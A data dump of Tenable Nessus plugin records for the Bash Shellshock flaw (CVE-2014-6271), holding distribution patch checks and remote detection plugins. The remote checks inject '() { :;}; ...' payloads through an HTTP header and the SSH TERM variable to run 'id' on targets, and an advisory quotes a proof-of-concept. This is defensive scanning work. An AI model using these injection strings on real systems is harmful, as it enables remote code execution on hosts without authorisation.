cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77835", "published": "2014-09-25T00:00:00", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1293 and \n# CentOS Errata and Security Advisory 2014:1293 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77835);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?218f06b1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020583.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f85a2dec\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020585.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93307af1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-September/020650.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3adf2ea1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:27", "bulletinFamily": "scanner", "description": "Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This account is currently not available.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-20T00:00:00", "id": "FEDORA_2014-11295.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77935", "published": "2014-09-29T00:00:00", "title": "Fedora 21 : bash-4.3.22-3.fc21 (2014-11295) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11295.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77935);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"FEDORA\", value:\"2014-11295\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Fedora 21 : bash-4.3.22-3.fc21 (2014-11295) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This\naccount is currently not available.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.openwall.com/lists/oss-security/2014/09/24/10\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2014/09/24/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141597\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139077.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d79d1c0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bash-4.3.22-3.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "modified": "2018-06-27T00:00:00", "id": "BASH_REMOTE_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77823", "published": "2014-09-24T00:00:00", "title": "Bash Remote Code Execution (Shellshock)", "type": "nessus", "sourceData": "#TRUSTED 5b82e80e558f06f5c11986e28ee8aa5ba7aa2a16e343c338906840d1977fdc3e44bcdd177184239b5c2d52549200e684bb4da063692f578c6d000001793efb78d2e623413b0440b5c6735ca6719a11f264e41803ef7efa3cad4ec4705fffa56479772d8cc1d2981795398ebf2e3fda5d35d763b1a3611049e03fb67ae4a9eee1edad1062ae53e3aa3bc9fec2ae27e0e03aca7a998aa1ed9b94da784ff6a40612c83a222072c852a7dc2b5b9ee84d7c119f9523603ffedb03510b975c00c1e0a4c1c4f248769cdfd1c1f0b867d3716cb422fcb828153eece5b055d4a3fb475dc9dfe5801c749f704f2956df1ae14fa59f1448ca4f959ccdcd5ab9267048e5de8032c097699f98d0a0de20653ef14be45063aac89dd0448646c050ae229c5e8977f1767f0c95e079ad9de31ec68bace6ea1fad214cd94c629072fe77800063dc36865c7dd703523f17626de355917e5673bcddedaaf6535eb73d5c0af087be866f596ffb9ab96cfd262c9c6ed459447461c87d28a372ed36856851d3d92f433f1033038fe1dc75524969cf29c498ce3cd814665d594ea99d44f77350f8317133916b5fb86f9505e66ca77731425ffe2743155f7e75b4cb7ece956b32b64c2850678d43c62435b0a73276de23a10ab08f305772734863e8b0332e16a88502c4ae628a434841bf2d6a3965d845edb0d396e122669dc6248cb5318f9fed7802805a93\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77823);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/06/27\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n\n script_name(english:\"Bash Remote Code Execution (Shellshock)\");\n script_summary(english:\"Logs in with SSH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"data_protection.inc\");\n\ndisable_ssh_wrappers();\nport = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nret = ssh_open_connection();\nif (!ret) audit(AUDIT_SOCK_FAIL, port, \"SSH\");\n\ninfo_t = INFO_SSH;\n\nfilename = \"nessus.\" + unixtime();\n\ntest_command = \"echo Plugin output: $((1+1))\";\nterm = \"() { :;}; \" + test_command + \" > /tmp/\" + filename;\ncommand = \"bash -c 'cat /tmp/\" + filename + \"'\";\noutput = ssh_cmd(cmd:command, term:term, noexec:TRUE);\n# attempt cleanup\ncleanup = \"rm /tmp/\" + filename;\nssh_cmd(cmd:cleanup);\n\nif (\"Plugin output: 2\" >!< output)\n{\n if(info_t == INFO_SSH) ssh_close_connection();\n audit(AUDIT_HOST_NOT, \"affected.\");\n}\n\ntest_command = \"/usr/bin/id\";\nterm2 = \"() { :;}; \" + test_command + \" > /tmp/\" + filename;\ncommand = \"bash -c 'cat /tmp/\" + filename + \"'\";\noutput2 = ssh_cmd(cmd:command, term:term2, noexec:TRUE);\n# attempt cleanup\ncleanup = \"rm /tmp/\" + filename;\nssh_cmd(cmd:cleanup);\n\nif(info_t == INFO_SSH) ssh_close_connection();\n\nif (output2 =~ \"uid=[0-9]+.*gid=[0-9]+.*\")\n{\n term = term2;\n output = output2;\n}\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus was able to set the TERM environment variable used in an SSH' +\n '\\n' + 'connection to :' +\n '\\n' +\n '\\n' + term +\n '\\n' +\n '\\n' + 'and read the output from the file :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:output) +\n '\\n' +\n '\\n' + 'Note: Nessus has attempted to remove the file /tmp/' + filename + '\\n';\n security_hole(port:port, extra:report);\n exit(0);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:27", "bulletinFamily": "scanner", "description": "Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-2362-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77854", "published": "2014-09-25T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2362-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77854);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/12/01 15:12:39\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"USN\", value:\"2362-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stephane Chazelas discovered that Bash incorrectly handled trailing\ncode in function definitions. An attacker could use this issue to\nbypass environment restrictions, such as SSH forced command\nenvironments.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2362-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "Stephane Chazelas discovered a vulnerability in bash, the GNU Bourne-Again Shell, related to how environment variables are processed. In many common configurations, this vulnerability is exploitable over the network, especially if bash has been configured as the system shell.", "modified": "2018-09-17T00:00:00", "id": "DEBIAN_DSA-3032.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77825", "published": "2014-09-25T00:00:00", "title": "Debian DSA-3032-1 : bash - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3032. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77825);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"DSA\", value:\"3032\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Debian DSA-3032-1 : bash - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-3032\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bash packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 